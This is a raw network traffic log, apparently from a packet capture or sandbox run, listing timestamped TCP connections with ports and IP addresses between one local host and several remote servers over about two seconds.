Nov 10, 2024 04:55:20.137675047 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.137782097 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.137809992 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.137860060 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.144131899 CET	49703	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:55:20.148889065 CET	443	49703	23.1.237.91	192.168.2.5
Nov 10, 2024 04:55:20.193346024 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.193411112 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.243550062 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.243561983 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.243783951 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.244936943 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.244973898 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.244997978 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.290870905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:20.290926933 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:20.399770021 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.400785923 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.400805950 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.401659966 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.401710033 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.402694941 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.402755022 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.402895927 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.402903080 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.413639069 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.413819075 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.413827896 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.414669991 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.414716005 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.418391943 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.418442965 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.418659925 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.418664932 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.423754930 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.423954964 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.423960924 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.424801111 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.424860954 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.425888062 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.425946951 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.426018953 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.426024914 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.461807966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:20.466579914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:20.473067999 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.481774092 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.486409903 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.486426115 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.487088919 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.487093925 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.487710953 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.487728119 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.488173962 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.488179922 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.498856068 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.499133110 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.499552011 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.499567032 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.499582052 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.499594927 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.500013113 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.500019073 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.500737906 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.500741959 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.518646002 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.522182941 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.522207975 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.524867058 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.524872065 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.531250000 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.531339884 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.536237001 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.536251068 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.549756050 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.549817085 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.549974918 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.549983025 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.556205988 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.556536913 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.556583881 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.556642056 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.556873083 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:20.556875944 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:20.611058950 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.611160994 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.611207008 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.612020016 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.612291098 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.612355947 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.626231909 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.626245022 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.626254082 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.626259089 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.627295017 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.627304077 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.627327919 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.627331972 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.628880978 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.628940105 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.629004955 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.629590988 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.630382061 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.630448103 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.632792950 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.634402037 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.634406090 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.634416103 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.634418964 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.637382984 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.637413025 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.637624025 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.643810034 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.643830061 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.643841028 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.643846035 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.646210909 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.646224976 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.646857023 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.646877050 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.647903919 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.647921085 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.647941113 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.647962093 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.648073912 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.648085117 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.648148060 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.648159981 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.654237032 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.654244900 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.654320002 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.654452085 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.654459000 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.655540943 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.655746937 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.657319069 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.657354116 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.657365084 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.657375097 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.657378912 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.661580086 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.661590099 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.661684036 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.661772013 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:20.661782026 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:20.744565964 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.744636059 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.770493031 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.770498037 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.827553034 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.827564001 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.827627897 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.828547001 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.828556061 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.880079985 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.880089998 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:20.880171061 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.880671024 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:20.880681038 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:21.153975010 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.153990030 CET	443	49794	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.154051065 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.154320002 CET	49795	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.154335976 CET	443	49795	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.154584885 CET	49795	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.154844999 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.154851913 CET	443	49794	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.155073881 CET	49795	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.155086040 CET	443	49795	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.242672920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:21.242727041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:21.378007889 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.379705906 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.379729986 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.380187988 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.380193949 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.385369062 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.386015892 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.386025906 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.387538910 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.387543917 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.389383078 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.389678955 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.389708996 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.390451908 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.390458107 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.392581940 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.393953085 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.393968105 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.394455910 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.394462109 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.397141933 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.397999048 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.398009062 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.398420095 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.398422956 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.500041962 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:21.500092030 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:21.500147104 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:21.500705004 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.500749111 CET	49795	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.501852989 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.501873970 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.502129078 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.502151966 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.502172947 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.502355099 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.502363920 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.502379894 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.502594948 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.502608061 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.508456945 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.508658886 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.508847952 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.509789944 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.509800911 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.509809971 CET	49789	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.509819984 CET	443	49789	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.514971018 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.514985085 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.515165091 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.515866995 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.515984058 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.516016006 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.516026974 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.516047955 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.516163111 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.516170025 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.516179085 CET	49788	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.516182899 CET	443	49788	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.519188881 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.519203901 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.519588947 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.520275116 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.520287037 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.520515919 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.520731926 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.520778894 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.520870924 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.520875931 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.520898104 CET	49791	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.520900965 CET	443	49791	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.523694038 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.523828983 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.523962975 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.524245024 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.524252892 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.524276018 CET	49787	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.524280071 CET	443	49787	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.526303053 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.526328087 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.526484966 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.526699066 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.526710987 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.528346062 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.528366089 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.528521061 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.528669119 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.528680086 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.530241966 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.530479908 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.530546904 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.530672073 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.530677080 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.530687094 CET	49790	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.530689955 CET	443	49790	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.533382893 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.533392906 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.533469915 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.533632994 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:21.533644915 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:21.543335915 CET	443	49795	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.547329903 CET	443	49794	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.585405111 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.585434914 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.585540056 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.585617065 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.585628033 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.586065054 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.586087942 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.586100101 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.586184025 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.586198092 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.600969076 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.600990057 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.601219893 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.601531982 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.601538897 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.601602077 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.601722956 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.601736069 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.601835966 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.601846933 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.767488003 CET	443	49795	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.767559052 CET	49795	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.791982889 CET	443	49794	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.792074919 CET	443	49794	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.792146921 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.792146921 CET	49794	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.805674076 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.805704117 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.805871010 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.805902004 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.805910110 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.805993080 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.806117058 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.806130886 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.806282997 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:21.806296110 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:21.988495111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.099637032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.100146055 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.100456953 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.100563049 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.104778051 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.106323004 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.123104095 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.123131037 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.123280048 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.123302937 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.124129057 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.124191046 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.124316931 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.124372959 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.125085115 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.125102043 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.127265930 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.127341032 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.127664089 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.127728939 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.128122091 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.128129005 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.128171921 CET	49793	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.128180027 CET	443	49793	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.129863977 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:22.129878044 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:22.130250931 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.130264997 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.130289078 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:22.130405903 CET	49810	443	192.168.2.5	23.218.232.185
